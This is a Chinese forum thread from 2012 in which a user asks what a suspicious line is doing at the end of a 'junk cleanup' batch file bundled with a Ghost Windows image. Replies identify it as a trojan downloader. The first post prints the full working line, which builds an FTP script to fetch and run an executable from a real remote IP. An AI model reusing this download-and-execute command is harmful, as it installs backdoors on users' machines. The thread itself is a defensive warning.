被坑了这么些年，高手看看这是个什么木马啊

显示全部楼层 · 发表于 2012-12-4 11:51:28

ghost系统自带的垃圾清理，名字叫　系统垃圾清理.bat ,今天执行的时候，突然发现最下边的一行命令，

请高手查看下是什么作用的木马

@echo off
@echo open 61.183.55.40>>net.txt&@echo anrl>>net.txt&@echo evib>>net.txt&@echo get 5.91.exe %systemroot%\system\5.91.exe >>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt&%systemroot%\system\5.91.exe&exit

显示全部楼层 · 发表于 2012-12-4 12:45:54

病毒名称：TrojanDownloader.JS.Small.ap
中文名：“小不点”变种ap
病毒长度：251字节
病毒类型：木马下载器

病毒描述：
TrojanDownloader.JS.Small.ap“小不点”变种ap是木马下载器家族的最新成员之一，采用JavaScript脚本语言编写，未加密。“小不点”变种ap一般内嵌在恶意网页中，如果用户计算机没有安装微软发布的相应漏洞补丁，那么当用户使用浏览器访问带有“小不点”变种ap的恶意网页后，就会在被感染计算机的后台连接骇客指定远程服务器站点“http://61.183.55.40/”，下载恶意程序“3.exe”并自动运行。其中所下载的恶意程序“3.exe”为“灰鸽子”远程控制后门程序。

这个GHOST盘中的系统垃圾清理被人改了，自动下载病毒，请注意！

显示全部楼层 · 发表于 2012-12-4 12:58:18

嗯，谢谢，不知道是什么时间改的，幸好我之前也没用过，才用了两次就发现了，赶紧杀毒．

显示全部楼层 · 发表于 2012-12-4 13:01:52

我原来在网上看到过一个网友写的系统LJ清理.bat，写的很简单，但是效果很好。
这个应该是被人改动了！

显示全部楼层 · 发表于 2012-12-4 19:35:42

唉。。可怜的楼主赶紧杀软全盘下吧
清理垃圾可以用CC

显示全部楼层 · 发表于 2012-12-4 20:45:06

请你慎重GHOST系统

显示全部楼层 · 发表于 2012-12-4 21:45:56

我这里有系统清理.bat

显示全部楼层 · 发表于 2012-12-4 21:56:39

哇，够危险

显示全部楼层 · 发表于 2012-12-5 09:48:18

建议楼主最好使用纯净版的GHOST镜像安装，那些修改过的系统难保没有植入木马病毒，而且也劲量慎重使用这类批处理文件，要清理系统还是使用正规的专业清理软件吧，这类软件在辅助区很容易看到的

显示全部楼层 · 发表于 2012-12-5 16:17:21

自从知道http://msdn.itellyou.cn/后，再也不用GHOST版。

[讨论] 被坑了这么些年，高手看看这是个什么木马啊

评分

评分